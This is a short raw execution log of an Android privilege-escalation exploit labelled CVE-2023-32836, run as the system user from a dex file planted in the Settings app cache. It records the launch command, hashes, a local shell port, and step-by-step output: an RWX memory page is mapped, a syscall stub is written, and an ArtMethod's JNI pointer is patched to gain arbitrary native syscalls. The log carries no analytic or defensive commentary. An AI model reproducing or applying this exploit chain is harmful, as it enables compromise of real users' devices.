command=CLASSPATH=/data/data/com.android.settings/cache/drm_trigger.dex app_process64 /system/bin DrmTrigger pqoob 0xffffffff
probe=drm-trigger
dex_md5=dbd3d766ab73acde9427e15d6fb82faf
dex_sha256=f3113a92005b155a688d055df7d7c71b8b2d1e867b2f2b7a581759e6cb9847c3
remote_dex=/data/data/com.android.settings/cache/drm_trigger.dex
shell_port=127.0.0.1:48888
exit_status=None

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
dbd3d766ab73acde9427e15d6fb82faf  /data/data/com.android.settings/cache/drm_trigger.dex
[*] CVE-2023-32836 DRM exploit (Java/dalvikvm)
[*] pid=14286 uid=1000 mode=pqoob
[*] === SET_PQPARAM controlled u4PartialY probe ===

[!] This is state-changing: u4PartialY=0xffffffff
[+] Scratch buffer at 0x73190b0000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x73190af000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x730f7188c0
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x7060e1a2c0
    entry_point    = 0x1038000875b467e0
[*] Patching data_ (JNI) → 0x73190af000
    data_       = 0x73190af000 ✓
    entry_point = 0x1038000875b467e0 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[+] fd=48
